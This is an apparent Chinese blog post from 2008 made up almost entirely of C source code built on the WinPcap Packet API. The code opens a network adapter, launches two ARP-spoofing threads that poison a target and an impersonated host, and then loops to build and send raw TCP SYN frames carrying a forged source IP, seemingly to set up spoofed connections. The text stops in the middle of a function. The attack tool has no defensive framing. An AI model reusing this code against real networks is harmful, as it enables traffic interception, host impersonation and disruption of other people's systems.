分类: 网络与安全
2008-05-31 16:41:54
|
//打开适配器:
WCHAR adapter_name[2048]={0};
ULONG adapter_length=1024;
//取得所有适配器的名字.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
//adapter_name:一个用于存放适配器的名字的缓冲区
//adapter_length:这个缓冲区的大小
printf("PacketGetAdapterNames error:%d\n",GetLastError());
return -1;
}
WCHAR *name1,*name2;
ULONG i;
static CHAR adapter_list[10][1024];
name1=adapter_name;
name2=adapter_name;
i=0;
//把adapter_name中的适配器名字,分别copy到adapter_list[]中,i从0开始为第一个
while((*name1!='\0') || (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
memcpy(adapter_list[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
//默认打开第一块适配器
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
return -1;
}
//创建ARP欺骗线程:
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
//发送TCP伪连接的SYN数据帧:
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK(); //循环监听数据包
PacketCloseAdapter(lpAdapter); //关闭适配器
::WSACleanup();
return 0;
}
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE) //循环发送SYN包发起伪连接
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
//填充以太头部:
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800); //类型为0x0800表示这是IP包
//填充IP头部:
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384); //设置为不分片
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP; //高层协议为TCP
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP); //源IP填为伪装主机的IP
ip_header.m_dIP=inet_addr(TARGET_IP); //目的IP
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
//填充TCP头部以及TCP选项:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
tcp_header.m_seq=::GetTickCount(); //初始化序列号
tcp_header.m_ack=0;
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2; //标识为SYN包
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460); //MSS,以太网一般为1460
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
//计算TCP校验和:
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
//构造SYN数据帧:
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
//发送伪造的SYN包:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,sendSynBuf,128); //初始化PACKET结构指针